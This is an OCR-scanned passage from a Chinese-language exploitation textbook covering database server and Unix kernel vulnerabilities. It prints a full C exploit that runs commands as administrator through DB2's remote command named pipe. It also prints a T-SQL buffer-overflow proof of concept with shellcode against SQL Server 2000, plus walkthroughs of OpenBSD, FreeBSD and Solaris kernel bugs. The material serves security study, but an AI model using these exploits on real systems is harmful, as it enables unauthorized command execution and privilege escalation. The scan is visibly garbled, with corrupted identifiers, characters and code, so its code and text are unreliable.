的 命名 管道 , 远程 客户 端 可 以 通过 它 发 送 命令 , 服务 器 也 会 通过 它 把 命令 执行 结果 返回 给 客户 端 。 
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在 命令 发 送 前 , 在 第 一 次 写 操作 时 完成 握手 , 在 第 二 次 写 操作 时 发 送 命令 。 收 到 两 个 写 操作 之 后 ， 
派生 单独 的 进程 qbp2rcmdc .exe， 由 它 负 责 执行 命令 。 这 个 服务 器 在 dab2admin 账 户 的 安全 上 下 文 
里 启动 并 运行 ， 而 db2admin 账 号 默认 情况 下 具有 管理 员 特 权 ， 更 为 可 怕 的 是 ， 服 务 器 依然 用 这 个 
权限 运行 db2rcmGc， 并 执行 客户 端 传 来 的 命令 。 当 然 ， 为 了 连接 DB2REMOTECMD 管 道 ， 客 户 端 需 
要 合法 的 ID 和 密码 ， 但 假如 他 们 有 ID 和 密码 ， 即 使 是 低 权 限 的 用 户 也 能 以 管理 员 权 限 运 行 命令 。 
不 用 多 说 ， 这 肯定 是 一 个 安全 风险 。 在 最 坏 的 情况 下 ，IBM 应 该 修改 远程 命令 服务 器 的 代码 ， 在 
执行 命令 前 ， 至 少 应 该 先 调用 ImpersonateNamedPipeclient。 这 样 做 的 目的 是 ， 用 发 送 请 求 用 
户 的 权限 和 管理 员 的 特权 来 执行 命令 。 最 好 的 情况 是 加 强 命名 管道 的 安全 性 , 仅 允 许 具有 管理 员 
特权 的 用 户 使 用 这 个 服务 。 这 个 代码 将 在 远程 服务 器 上 执行 一 条 命令 并 返回 结果 。 


#include <stdio.h> 
#include «windows.h» 


int main(int argc, char *argv[]) 
{ 

char buffer[540]=""; 

char NamedPipe[260]="\\\\"; 
HANDLE rcmd-NULL; 

char *ptr = NULL; 

int len =0; 

DWORD Bytes = 0; 


if(argc !=3) 
{ 
printf("\n\tDB2 Remote Command Exploit.\n\n"); 
printf("\tUsage: db2rmtcmd target \"command\"\n"); 
printf ("\n\tDavid Litchfield\n\t (david@ngssoftware.com) \n\t6th 
September 2003\n"); ` 
return 0; 


} 


strncat (NamedPipe,argv[1],200); 
strcat (NamedPipe, "\\pipe\\DB2REMOTECMD"); 


// Setup handshake message 
ZeroMemory (buffer,540); 
buffer [0]=0x01; 

ptr = &buffer[4]; 

strcpy (ptr, "DB2"); 

len = strlen(argv[2]); 
buffer [532]=(char)len; 


// Open the named pipe 
rcmd = CreateFile(NamedPipe, GENERIC_WRITE|GENERIC_READ,0, 
NULL, OPEN_EXISTING, 0, NULL) ; 
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if(rcmd == INVALID HANDLE VALUE) 
return printf("Failed to open pipe $s. Error %$d.\n",NamedPipe,GetLastError()); 


// Send handshake 
len = WriteFile(rcmd,buffer,536,&Bytes,NULL); 


if(!len) 
return printf("Failed to write to $s. Error %$d.\n",NamedPipe,GetLastError()); 


ZeroMemory (buffer,540); 
strncpy (buffer,argv[21,254); 


// Send command 
len = WriteFile(rcmd,buffer,strlen(buffer),&Bytes,NULL); 


if(!len) 
return printf("Failed to write to %s. Error %d.\n",NamedPipe,GetLastError()); 


// Read results 
while(len) 


{ 
len = ReadFile(rcmd,buffer,530,&Bytes,NULL); 


printf ("%s",buffer); 
ZeroMemory (buffer,540); 
} 


return 0; 

} 

允许 远程 执行 命令 肯定 会 带 来 一 些 风险 ， 应 该 尽 可 能 禁用 这 样 的 服务 。 

在 前 面 ， 我 们 列 了 一 些 通 过 RDBMS 软 件 执行 操作 系统 命令 的 方法 。 当 然 不 仅仅 局 限于 此 ， 
我 们 鼓励 你 仔细 检查 数据 库 服务 器 软件 ， 找 出 漏洞， 并 采取 相应 的 措施 防止 它 受 到 损害 。 
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在 SQL 层 破解 漏洞 要 比 在 低层 容易 些 。 当 然 ,这 不 是 说 在 低层 破解 漏洞 非常 困难 一 一 只 是 稍 
微 有 点 难 。 说 在 SQL 层 比较 容易 的 原因 是 ， 我 们 可 以 利用 客户 端 工 具 (如 微软 的 Query Analyzer 
和 Oracle 的 SQL*Pluse) 封装 我 们 利用 恰当 的 高 层 协议 〈 如 TDS 和 TNS) 的 破解 。 也 就 是 说 ， 我 们 
可 以 用 所 选 的 SQL 扩展 编写 破解 代码 。 


SQL 函数 

许多 SQL 层 漏洞 都 是 出 现在 函数 或 扩展 存储 过 程 中 的 。 而 在 真正 的 SQL 语法 分 析 程 序 里 ， 
漏洞 还 是 比较 少 的 。 当 然 ， 这 也 合乎 逻辑 。 因 为 SQL 语法 分 析 程 序 是 数据 库 的 核心 部 分 ， 要 处 
理 无 数 种 查询 ， 所 以 现实 情况 要 求 它 很 健壮 ， 它 的 代码 必须 没有 bug。 而 从 另 一 方面 说 ， 函 数 和 
扩展 存储 过 程 一 般 只 用 来 执行 一 两 个 明确 的 动作 ， 没 那么 多 要 求 ， 所 以 也 没有 对 代码 进行 严格 
的 检查 。 

破解 代码 里 的 大 部 分 可 执行 代码 不 是 可 打印 的 ASCI 字 符 ， 因 此 ， 我 们 需要 找到 一 个 方法 从 
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SQL 客户 端 工具 得 到 可 打印 的 ASCI 字 符 。 乍 一 听 好 像 难度 比较 大 ， 其 实 不 然 。 正 像 我 们 已 经 说 
过 的 ， 在 SQL 层 可 以 用 来 破解 的 方法 是 无 限 的 ，SQL 扩 展 部 分 提供 了 十 分 宽松 的 编程 环境 ， 可 以 
用 任何 可 想到 的 方式 编写 破解 代码 。 先 看 一 些 例 子 。 

{# FACHR/CHARH 2X 

许多 SQL 环境 里 都 有 cHR 或 cHaR 函 数 ， 它 们 获取 数字 并 将 其 转换 成 字符 。 我 们 可 以 利用 cHR 
函数 建立 可 执行 代码 。 例 如 ， 如 果 想 编码 并 执行 call eax， 它 相应 的 指令 字 节 是 0xFF 和 0xDp0。 
在 微软 的 SQL 里 ， 我 们 可 以 这 样 做 : 


DECLARE @foo varchar (20) 
SELECT @foo = CHAR(255) + CHAR(208) 


#£ Oracle E fi ACHR () 函数 。 

有 时 候 ， 甚 至 都 不 需要 用 cHR/CHAR 函 数 。 如 下 所 示 ， 我 们 可 以 直接 用 十 六 进 制 插 入 这 个 
字 节 。 

SELECT @foo = OxFFDO 

用 这 样 的 方法 可 以 没有 障碍 地 得 到 需要 的 二 进 制 代码 。 看 一 个 实际 的 例子 ， 考 虑 下 列 T-SQL 
代码 ， 它 破解 微软 SQL Server 2000 里 的 一 个 栈 缓冲 区 溢出 。 


-- Simple Proof of Concept 
-- Exploits a buffer overrun in OpenDataSource() 


-- Demonstrates how to exploit a UNICODE overflow using T-SQL 

-~ Calls CreateFile() creating a file called c:\SQL-ODSJET-BO 

-- I'm overwriting the saved return address with 0x42BO0C9DC 

-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2 
-- The address holds a jmp esp instruction. 


-- To protect against this overflow download the latest Jet Service 
-- pack from Microsoft - http://www.microsoft.com/ 


-- David Litchfield (david@éngssoftware.com) 
-- 19th June 2002 

declare Gexploit nvarchar (4000) 

declare @padding nvarchar (2000) 

declare 8saved return address nvarchar(20) 
declare @code nvarchar (1000) 

declare @pad nvarchar (16) 

declare @cnt int 

declare @more_pad nvarchar(100) 


select @cnt = 0 
select @padding = 0x41414141 
select @pad = 0x4141 


while Gcnt < 1063 
begin 
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select @padding = @padding + @pad 
select Gcnt = @cnt + 1 
end 


-- overwrite the saved return address 


select @saved_return_address = 0xDCC9B042 
select @more_pad = 0x4343434344444444454545454646464647474747 


-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K Sp2 


-- change if running a different service pack 


select @code = 
0x55 8BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0C 


05052B8876FE877FFDOCCCCCCCCCC 

select @exploit = N'SELECT * FROM OpenDataSource ( 
''Microsoft.Jet.OLEDB.4.0'',''Data Source-"c:V' 

Select Gexploit = @exploit + @padding + @saved_return_address + @more_pad + @code 
select @exploit = @exploit + N'";User ID=Admin; Password=; Extended 
properties-Excel 5.0'')...xactions' 

exec (Gexploit) 


24.5 小结 


希望 通过 本 章 的 学 习 ， 读 者 已 经 了 解 了 怎样 依靠 RDBMS 软 件 逼 近 攻 击 的 线索 。 这 个 方法 与 
从 大 部 分 其 他 的 软件 片段 中 得 到 的 相似 ， 只 有 一 个 主要 的 区 别 。 可 以 把 攻击 数据 库 服务 器 和 攻击 
编译 器 做 一 个 比较 : 前 者 非常 灵活 ， 并 且 有 足够 大 的 编程 空间 ， 算 得 上 是 比较 容易 了 。DBA 需 要 
留意 数据 库 服务 器 里 的 漏洞 ， 把 他 们 的 服务 器 锁 好 。 希 望 Slammer 是 最 后 一 个 蠕虫 ， 如 果 不 是 ， 
蠕虫 将 轻而易举 地 控制 数据 库 服 务 器 。 






UNIX 内 核 溢出 











TE; 我 们 将 研究 儿 个 内 核 级 漏洞 ， 编 写 健壮 可 靠 的 UNIX 内 核 破解 。 各 种 OS 内 核 都 
+ 有 一 些 常见 的 问题 ， 我 们 将 识别 那些 可 能 会 导致 漏洞 可 利用 的 条 件 ， 也 会 分 析 一 些 已 
知 的 bug。 在 熟悉 各 种 内 核 漏洞 之 后 ， 我 们 将 把 重点 放 在 两 个 漏洞 破解 上 ， 这 两 个 漏洞 是 我 们 在 
为 写作 本 章 做 准备 的 过 程 中 ， 在 OpenBSD 和 Solaris 里 发 现 的 。 

在 所 有 版 本 的 OpenBSD 和 Solaris 里 , 我 们 所 讨论 的 这 两 个 漏洞 都 会 导致 用 户 可 以 访问 内 核 级 
的 OS 资 源 。 内 核 级 访问 可 能 会 造成 非常 严重 的 后 果 ， 最 直接 的 危害 就 是 利用 它 提 升 特权 ， 因 此 ， 
它 能 危及 各 种 内 核 级 的 安全 措施 ， 比 如 说 改写 根 目 录 、 系 统 跟踪 和 其 他 提供 可 信 B1 级 OS 能 力 的 
商业 产品 。 我 们 也 将 探究 OpenBSD 的 主动 性 安全 和 它 在 防范 内 核 级 破解 时 的 问题 。 希望 这 些 内 容 
可 以 启发 并 鼓励 你 瞄准 其 他 想像 中 完全 安全 的 操作 系统 。 
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由 于 存在 许多 脆弱 的 函数 以 及 不 良 的 编程 习惯 , 内核 区 域 中 存在 可 利用 的 条 件 。 我 们 将 以 多 
种 内 核 为 例 ， 仔 细 检 查 这 些 漏洞 ， 并 提示 在 审计 内 核 时 应 该 注意 什么 。Dawson Engler 的 精彩 论 
X “Using Programmer-Written Compiler Extensions to Catch Security Holes” (www.stanford.edu/~ 
englersp-ieee-02.ps)， 介 绍 了 在 内 核 区 域 搜索 漏洞 时 应 该 寻找 什么 ， 并 提供 了 精彩 的 实例 。 

尽管 已 经 发 现 了 许多 不 良 的 编程 习惯 ,特别 是 会 产生 内 核 级 漏洞 的 编程 习惯 , 但 是 ， 即 使 是 
在 严格 的 代码 审计 下 , 一 些 隐患 仍 有 可 能 潜伏 下 来 。 本 章 介绍 的 OpenBSD 内 核 栈 谥 出 就 属于 不 常 
被 审计 的 函数 。 包 含 潜 在 的 、 与 用 户 区 API 的 strcpy 和 memcpy 相 似 的 危险 函数 的 内 核 区 ， 可 能 

常见 的 函数 和 人 逻辑 错误 摘要 如 下 。 

Q 有 符号 整数 问题 

a buf [user_controlledq_index] 漏 酒 
E copyin/copyout MAX 
a 整数 溢出 
m malloc/freerf 
a copyin/copyout mR 


整数 运算 问题 
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a 缓冲 区 溢出 ( 栈 / 堆 ) 
" copyin 和 其 他 类 似 的 函数 
m 从 虚拟 节点 到 内 核 缓冲 区 的 读 / 写 
a 格式 化 串 溢 出 
m log, print ee 
a 设计 错误 
mmodload. ptrace 
让 我 们 看 几 个 已 经 公开 的 内 核 级 漏洞 , 用 实际 的 例子 说 明 怎样 解决 各 种 破解 问题 。 我 们 会 介 
绍 以 下 几 个 案例 : 2 个 OpenBSD 内 核 溢出 〈 见 PhracK 第 60 期 ， 文 章 0k6)，1 个 FreeBSD 内 核 信息 汇 
露 ，1 个 Solaris 设 计 错 误 。 


2.1 - OpenBSD select() kernel stack buffer overflow 


sys_select(p, v, retval) 
register struct proc *p; 
void *v; 
register t *retval; 


register struct sys select args /* | 
syscallarg(int) nd; 
syscallarg(fd set *) in; 
syscallarg(fd set *) ou; 
syscallarg(fd set *) ex; 
syscallarg(struct timeval *) tv; 

) */ *uap = vi 

fd set bits[6], *pibitsI3], *pobits [3]; 

struct timeval atv; 

int s, ncoll, error = 0, timo; 

u_int ni; 


[1] if (SCARG (uap, nd) > p->p_fd->fd_nfiles) { 
/* forgiving; slightly wrong */ 
SCARG(uap, nd) = p-»p fd-»fd nfiles; 
} 


[2] ni - howmany(SCARG(uap, nd), NFDBITS) * gizeof(fd mask); 
[3] if (SCARG(uap, nd) > FD SETSIZE) ( 
[deleted] 


#define getbits(name, x) 
[4] if (SCARG(uap, name) && (error = copyin( (caddr_t) SCARG (uap, name), 
(caddr t)pibits[xl, ni))) 
goto done; 
[51 getbits(in, 0); 
getbits(ou, 1); 
getbits(ex, 2); 
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#undef getbits 


[deleted] 
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sys/systm.h:114 


dif BYTE ORDER -- BIG ENDIAN 

#define SCARG(p, k) ((p)->k. be. datum) /* get arg from args pointer */ 
#elif BYTE_ORDER == LITTLE_ENDIAN 

#define SCARG(p, k) ((p)->k.le.datum) /* get arg from args pointer */ 


sys/syscallarg.h: line 14 


#define syscallarg(x) 
union { 
register_t pad; 
struct { x datum; } le; 
struct { 
int8_t pad[ (sizeof (register_t) < sizeof (x)) 
? 0 
: sizeof (register t) - sizeof (x)]; 
x datum; 
} be; 
} 


SCARG () 是 一 个 检索 struct sys_XXX_args 结 构 〈XXX 表 示 系 统 调 用 名 称 ) MAE, XC 
结构 保存 了 与 整个 系统 调用 有 关 的 数据 。 为 了 和 CPU 寄存 器 大 小 的 边界 保持 对 齐 ， 可 以 通过 
SCRARG () 访问 这 些 结构 的 成 员 ， 这 样 一 来 ， 内 存 访 问 速度 将 加 快 ， 内 存 访问 也 更 有 效率 。 为 了 使 
用 ScaRG() 宏 ， 系 统 调用 必须 用 如 下 的 形式 声明 (declare) 输入 参数 。 下 面 为 select () 系统 调用 
的 输入 参数 结构 。 


sys/syscallarg.h: line 404 


struct sys_select_args { 

[6] syscallarg(int) nd; 
syscallarg(fd_set *) in; 
syscallarg(fd_set *) ou; 
syscallarg(fd_set *) ex; 
syscallarg(struct timeval *) tv; 


}; 

这 个 特殊 的 漏洞 产生 原因 是 没有 对 nd 参数 进行 充分 的 检查 《你 可 以 在 代码 例子 里 标 [6] 的 
地 方 发 现 正 确 的 代码 行 )，nd 是 为 了 执行 从 用 户 区 到 内 核 区 的 复制 操作 而 被 用 于 计算 长 度 的 参 
数 。 

尽管 对 nd 参数 做 过 一 个 检查 [1] (nd 表示 这 个 最 高 的 已 编号 的 描述 符 加 上 fa_sets 里 的 任 
何 一 个 )， 用 于 核对 p->p_fd->fq_nfiles〔 进 程 正 持 有 的 打开 的 描述 符 的 数量 )。 但 这 个 检查 
是 不 完整 的 。 在 [16] 处 把 ng 声明 为 有 符号 ， 于 是 可 以 把 它 作为 负数 提供 ， 因 此 ， 在 [1] 处 的 “大 
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于 ”检查 将 被 绕 过 。 最 后 ， 为 了 为 copyin 操 作 中 的 ni 计算 长 度 参数 ， 在 [2] 处 的 howmany 0 宏 


使 用 nq。 - 
#define howmany (x, y) CCOO *CGQ0 71237 G1) 
ni - ((nd + (NFDBITS-1)) / NFDBITS) * sizeof(fd mask); 
ni = ((nd + (32 - 1)) / 32) * 4 


在 计算 ni 之 后 对 nd 参数 [3] 又 进行 了 检查 。 

这 个 检查 也 被 绕 过 去 了 ， 因 为 OpenBSD 开 发 者 总 是 忘 了 对 ng 参数 进行 符号 检查 。 检 查 [3] 是 
用 来 确定 在 随后 的 copyin 操 作 中 ， 在 栈 上 已 分 配 的 空间 是 否 够 用 ， 如 果 不 够 用 ， 将 在 堆 上 分 配 
足够 的 空间 。 

假设 符号 检查 不 充分 ， 我 们 将 绕 过 检查 [3]， 继 续 使 用 栈 空间 。 最 后 ， 将 定义 getbits OE 
[4,5]， 并 调用 它 来 找 回 用 户 提 供 的 fa_sets (readfds. writefds. exceptfds, XX JB fu 
含 了 用 于 测试 “准备 读 ” 人 “准备 写 ” 或 者 “异常 的 情况 挂 起 ”的 描述 符 )。 很 明显 ， 如 果 na 参 数 
作为 负 整 数 提交 ，copyin 操 作 〈 在 getbits 之 内 ) 将 改写 内 核 内 存 的 内 容 ， 使 用 某 些 内 核 溢出 技 
巧 将 导致 执行 任意 代码 。 

最 后 ， 把 所 有 的 块 拼凑 在 一 起 ， 这 个 漏洞 对 应 下 列 的 伪 代 码 。 


vuln_func(int user_number, char *user_buffer) { 
char stack_buf[1024]; 


if( user number > sizeof (stack _ buf) ) 
goto error; 


copyin(stack_buf, user_buf, user number); 
/* copyin is somewhat the kernel land equivalent of memcpy */ 


} 


2.2 - OpenBSD setitimer() kernel memory overwrite 


sys setitimer(p, v, retval) 
struct proc *p; 
register void *v; 
register t *retval; 


register struct sys setitimer args /* ( 

[1] syscallarg(u_int) which; 
syscallarg(struct itimerval *) itv; 
Syscallarg(struct itimerval *) oitv; 

} */ *uap = v; 

struct itimerval aitv; 

register const struct itimerval *itvp; 
int s, error; 
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int timo; 
[2] if (SCARG(uap, which) » ITIMER PROF) 
return (EINVAL); 
[deleted] 
[3] p-»p stats-»p timer[SCARG(uap, which)] = aitv; 
} 
Spix(s); 


return (0); 


} 

由 于 没有 充分 检查 用 户 控制 的 索引 整数 〈 该 整数 引用 内 核 结构 数据 中 的 一 个 入 口 )， 这 个 漏 
洞 可 以 归 类 于 内 核 内 存 改写 。 表 示 索 引 的 整数 被 用 于 对 内 核 结构 解 引 用 ， 因 而 写 入 内 核 内 存 里 的 
任意 位 置 。 由 于 在 验证 相对 于 固定 大 小 整数 〈 表 示 最 大 允许 的 索引 数 ) 的 索引 里 存在 符号 漏洞 ， 
这 是 可 能 的 。 

这 个 索引 数 是 系统 调用 的 which [11 参 数 , 在 注释 里 错误 地 声称 它 是 无 符号 整数 (/**/) [1]。 
实际 上 , 在 sys/syscallargs .h 的 369 行 里 which 参 数 被 声明 为 有 符号 整数 《在 OpenBSD 3.1 中 )， 
因此 ， 有 可 能 为 用 户 区 应 用 程序 提供 负数 ， 这 将 直接 导致 绕 过 在 12] 实 施 的 有 效 性 检查 。 最 后 ， 
内 核 将 把 which 参 数 作为 结构 [3] 的 缓冲 区 的 索引 ， 把 用 户 提供 的 结构 复制 到 内 核 内 存 。 在 这 个 
阶段 ， 仔 细 计 算 which 负 整数 ， 使 它 尽 可 能 写 入 进程 或 用 户 的 证 书 (凭证 ) 结构 ， 从 而 提升 特权 。 

可 以 用 下 列 伪 代 码 表示 这 个 漏洞 ， 用 于 说 明 各 种 内 核 里 可 能 的 易 受 攻击 的 模式 。 


vuln func(int user index, struct userdata *uptr) { 


if( user index » FIXED LIMIT ) 
goto error; 


kbuf[user index] - *uptr; 


} 


2.3 - FreeBSD accept() kernel memory infoleak 


int 

accept (td, uap} 
struct thread *td; 
struct accept args *uap; 





[1] return (accepti(td, uap, 0)); 
} 


static int 
accepti (td, uap, compat) 
struct thread *td; 
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[2] register struct accept_args /* { 
int S; 
caddr, t name; 
int *anamelen; 
) */ *uap; 
int compat; 


Struct filedesc *fdp; 
Struct file *nfp - NULL; 
struct sockaddr *sa; 


[3] int namelen, error, s; 
struct socket *head, *so; 
int fd; 


u_int fflag; 


mtx lock(&Giant); 
fdp = td->td proc-»p fd; 
if (uap-»name) ( 
[4] error = copyin(uap->anamelen, &namelen, sizeof (namelen)); 
if (error) 
goto done2; 
} 
[deleted] 
error = soaccept(so, &sa); 


[deleted] 
if (uap->name) { 
/* check sa_len before it is destroyed */ 


[5] if (namelen » sa-»sa len) 
namelen - sa-»sa len; 
[deleted] 
[6] error = copyout(sa, uap-»name, (u int)namelen); 
[deleted] 


} 

FreeBSD 接 受 系统 调用 漏洞 的 事实 是 因为 导致 内 核 内 存 信息 泄露 条 件 的 符号 问题 .accept () 
系统 调用 被 直接 分 派 给 accept1 () 函数 [1]， 只 带 有 一 个 额外 的 零 参 数 。 这 个 来 自用 户 区 的 参数 
被 打包 到 accept_args 结 构 [2] 里 ， 该 结构 包含 : 

Q 表示 套 接 字 的 整数 

a 指向 sockaqdr 结 构 的 指针 

a 指向 表示 sockadqr 结 构 大 小 的 有 符号 整数 的 指针 

一 开始 [4] [accepti ORA] 把 用 户 提供 的 长 度 参数 的 值 复 制 到 称 为 nameLlen[31 的 变量 。 
注意 ， 这 是 一 个 有 符号 整数 ， 可 以 是 负数 。 随 后 ，accept1 () 函数 执行 了 一 系列 与 套 接 字 相关 的 
操作 来 为 套 接 字 设 置 适 当 的 状态 。 这 使 套 接 字 进 入 “等 待 新 连接 ”状态 。 最 后 ，soaccept () B 
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数 用 连接 实体 [51 的 地 址 填写 新 的 sockaddr 结 构 ， 而 它 最 终 将 被 复制 到 用 户 区 。 
这 个 新 sockaddr 结 构 的 大 小 将 会 和 用 户 提交 的 大 小 参数 [5] 做 比较 , 确保 用 户 区 缓冲 区 有 足 
够 的 空间 保存 这 个 结构 。 不 幸 的 是 ， 这 个 检查 被 绕 过 了 ， 攻 击 者 可 以 为 namelen 整 数 提供 一 个 负 
数 ， 绕 过 大 小 比较 。 逃 避 大 小 检查 导致 一 大 块 内 核 内 存 复制 到 用 户 区 缓冲 区 。 
可 以 用 下 列 伪 代 码 表示 这 个 漏洞 ， 用 于 说 明 各 种 内 核 里 可 能 的 易 受 攻击 的 模式 。 
struct userdata 
int len Sa signed! */ 
char *data; 
u 


vuln, func(struct userdata *uptr) { 
struct kerneldata *kptr; 
internal func(kptr); /* fill-in kptr */ 


if( uptr->len > kptr->len ) 
uptr->len = kptr->len; 


copyout(kptr, uptr->data, uptr-»len]; 


} 


Solaris priocntl() directory traversal 


/* 
* The priocntl system call. 
*/ 
long 
priocntlsys(int pc version, procset t *psp, int cmd, caddr t arg) 
{ 
[deleted] 


switch (cmd) { 
[1] case PC GETCID: 


[2] if (copyin(arg, (caddr t)&pcinfo, sizeof (pcinfo))) 





error - 
[3] Scheduler load(pcinfo.pc clname, 
&sclass[pcinfo.pc cid]); 
[deleted] 
} 
int 


scheduler_load(char *clname, sclass_t *clp) 
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{ 


[deleted] 
[4] if (modload("sched", clname) == -1) 
return (EINVAL); 
rw enter(clp-»cl lock, RW READER); 
[deleted] 


) 

Solaris priocntl() 漏 洞 是 设计 错误 漏洞 类 型 里 的 典型 例子 。 我 们 不 探究 不 必要 的 细节 ， 只 
检查 漏洞 产生 的 原因 。priocnt1 是 一 个 供用 户 控制 LWP (light-weight process) 日 程 安排 
(scheduling) 的 系统 调用 ， 可 以 是 单一 进程 的 LWP 或 进程 本 身 。 在 常见 的 Solaris 安 装 中 ， 有 一 些 
受 支 持 的 日 程 安排 类 : 

口 real-time 类 

口 time-sharing 类 

口 fair-share 类 

口 fixed-priority 类 

所 有 的 这 些 日 程 安排 类 都 是 用 动态 可 加 载 的 内 核 模块 来 实现 的 。 他 们 基于 用 户 区 的 请 求 被 
prionct1 系 统 调 用 加 载 。 这 个 系统 调用 通常 从 用 户 区 cmda 和 指向 结构 arg 的 指针 接受 两 个 参数 。 
这 个 漏洞 位 于 被 条 件 语 名 [1] 处 理 的 Pc_GETCTD cmd 类 型 里 。cmq 参 数 的 位 移 (displacement) 量 
之 后 是 把 用 户 提供 的 arg 指 针 复 制 到 相关 的 日 程 安排 相关 类 结构 [2] 里 。 这 个 刚 复 制 的 结构 包含 
了 所 有 与 日 程 安排 类 相关 的 信息 ， 正 如 我 们 从 下 面 的 代码 段 里 可 以 看 到 的 : 


typedef struct pcinfo { 





id t pc. cid; /* class id */ 

char pc clname[PC CLNMSZ]; /* class name */ 

int pc clinfo[PC CLINFOSZ]; /* class information */ 
) pcinfo t; 


这 个 特殊 结构 的 有 趣 部 分 是 pc_clname 参 数 。 这 是 日 程 安排 类 的 类 名 及 相对 路 径 名 。 如 果 我 
们 想 使 用 名 为 myclass 的 日 程 安排 类 ，prioncti 系 统 调 用 将 在 /kernel/sched/ 和 
/usr/kernel/sched/ 目 录 中 搜索 mycall 内 核 模块 。 如 果 发 现 它 ， 将 会 加 载 它 。 所 有 这 些 步 骤 被 
[3] scheduler_load 和 [4Jmoaload 函 数 合 谐 地 组 织 在 一 起 了 。 像 前 面 讨 论 的 那样 ， 日 程 安排 类 
类 名 是 相对 路 径 名 ， 它 被 添加 到 所 有 内 核 模块 预定 义 的 路 径 名 之 后 。 当 这 个 添加 行为 存在 时 ， 没 
有 检查 目录 遍历 条 件 ， 在 类 名 里 用 . . /提供 类 名 是 有 可 能 的 。 现 在 ,我们 可 以 利用 这 个 漏洞 从 
*file 系 统 的 任意 位 置 加 载 任 意 内 核 模块 。 例 如 ， 像 ../../tmp/mymod 这 样 的 pc_clname 参 数 将 
被 译 成 /kernel/sched/../.. /tmp/mymod, 从 而 人 允许 恶意 内 核 模 块 被 载 入 内 存 。 

尽管 在 不 同 的 内 核 里 还 发 现 了 其 他 有 趣 的 设计 错误 〈ptrace，vfork 等 )， 但 我 们 相信 ， 这 
个 特殊 的 缺陷 是 一 个 极 好 的 内 核 漏洞 例子 。 在 写作 的 时 候 ， 在 所 有 当前 版 本 的 Solaris 系 统 里 ， 都 
可 以 用 类 似 的 方式 定位 并 破解 这 个 漏洞 。 priocnt1 错 误 是 一 个 重要 的 发 现 。 我 们 因此 对 modload 
接口 做 了 仔细 的 检查 ， 从 而 发 现 了 其 他 可 利用 的 内 核 级 漏洞 。 我 们 推荐 你 审查 以 前 出 现 过 的 内 核 
漏洞 ， 试 着 用 伪 代 码 或 某 种 错误 原 语 (primitive) 表示 他 们 ， 这 将 最 终 帮 助 你 识别 并 破解 属于 你 
自 CU Oday. 
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25.2 Oday 内 核 漏洞 

现在 , 我 们 将 介绍 本 书 编写 过 程 中 在 主流 操作 系统 里 发 现 的 一 些 内 核 漏洞 ， 同时 还 将 介绍 一 
些 还 从 没有 公开 过 的 发 现 和 破解 这 些 漏洞 的 新 技术 。 
25.2.1 OpenBSD exec_ibcs2_coff_prep_zmagic() 栈 溢出 

我 们 先 来 查看 曾 从 众多 审计 者 眼皮 底下 汶 走 的 接口 。 


int 
vn_rdwr(rw, vp, base, len, offset, segflg, ioflg, cred, aresid, p) 


[1] enum uio rw rw; 
(21 struct vnode *vp; 
[3] caddr t base; 

[4] int len; 


off t offset; 

enum uio seg segflg; 
int ioflg; 

struct ucred *cred; 
size t *aresid; 
struct proc *p; 


{ 


vn, rdwr () 函数 从 一 个 用 虚拟 节点 表示 的 对 象 读 取 数 据 ， 或 者 把 数据 写 入 这 个 对 象 。 一 个 虚 
拟 节点 代表 虚拟 文件 系统 里 的 一 个 对 象 。 通 过 路 径 名 来 创建 它 或 者 用 它 引用 文件 。 

你 可 能 在 想 , 在 查找 内 核 漏洞 的 时 候 , 为 什么 还 要 深入 研究 文件 系统 的 代码 呢 ? 这 个 漏洞 需 
要 我 们 从 一 个 文件 读数 据 ， 并 把 这 些 数据 保存 在 内 核 栈 缓冲 区 。 它 犯 了 一 个 信任 用 户 提供 的 大 小 
参数 的 小 错误 。 对 OpenBSD 操 作 系 统 进行 的 所 有 系统 级 审计 都 没有 发 现 这 个 漏洞 ,或 许 是 因为 审 
计 者 没有 注意 到 与 vm_raewr () 接 口 相 关 的 问题 。 我 们 劝 你 赶快 审查 内 核 API， 并 尝试 寻找 可 能 会 
成 为 未 来 内 核 漏洞 大 类 的 漏洞 ， 而 不 是 重复 搜索 熟悉 的 copyin/malloc 问题 。 

我 们 需要 了 解 4 个 重要 的 vn_rdwr () 参 数 ， 其 他 的 可 以 忽略 不 计 。 第 一 个 是 rw enum。 这 个 
rw 参数 表示 操作 模式 。 它 将 从 虚拟 节点 (v-node) 读 入 数据 ， 或 者 把 数据 写 入 虚拟 节点 。 第 二 个 
是 vp 指针 。 它 指向 读 / 写 文件 的 虚拟 节点 。 第 三 个 要 注意 的 是 基 址 (base) 指针 ， 它 是 指向 内 核 存 
eK OF. HES) 的 指针 。 最 后 是 len 整 数 ， 或 者 是 base 参 数 指 向 的 内 核 存 储 区 的 大 小 。 

rw 参数 UIO_READ 意 谓 着 用 vn_rdwr 从 文件 中 读 入 len 字 节 , 并 把 它们 保存 到 内 核 存储 区 base 
里 。UIO_WRITE 把 来 自 内 核 缓冲 区 base 的 len 字 节 数 据 写 入 文件 。 正 如 操作 所 暗示 的 一 样 ， 
UIO_READ 一 不 小 心 就 可 能 导致 溢出 ， 因 为 它 与 copyin() 操 作 类 似 。 反 之 ，UIO_WRITE 和 多 种 
copyout () 问题 类 似 ， 很 可 能 泄露 信息 。 像 以 前 一 样 ， 在 识别 潜在 的 问题 和 新 的 内 核 级 安全 错误 
分 类 之 后 ， 你 应 该 使 用 Cscope (源码 浏览 器 ) 查阅 整个 内 核 源 码 树 ， 寻 找 类 似 的 错误 。 换 名 话说 ， 
如 果 没 有 源码 ， 应 该 用 IDA Pro 开 始 二 进 制 审计 。 

简单 浏览 OpenBSD 内 核 里 的 vn_rawr 函 数 后 ,我 们 发 现 了 一 个 挺 滑 稽 的 内 核 错 误 ， 在 本 书 的 
编写 过 程 中 , 它 还 存在 于 所 有 的 OpenBSD 版 本 里 。 唯 一 的 例外 可 能 是 那些 省 略 某 些 兼 容 性 选项 的 
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定制 编译 的 内 核 。 实 际 上 ， 很 多 人 在 编译 定制 内 核 时 ， 仍 会 保留 兼容 性 选项 。 我 们 在 此 提醒 你 ， 
安全 的 默认 安装 里 也 存在 compat 选 项 。 


25.2.2 漏洞 
这 个 漏洞 存在 于 exec_ibcs2_coff prep_zmagic() 函 数 里 ， 当 然 ， 为 了 理解 这 个 漏洞 ， 你 
首先 应 该 熟悉 下 面 这 些 代 码 。 


/* 
* exec ibcs2 coff prep zmagic(): Prepare a COFF ZMAGIC binary's exec package 


* 


* First, set the various offsets/lengths in the exec package. 

* 

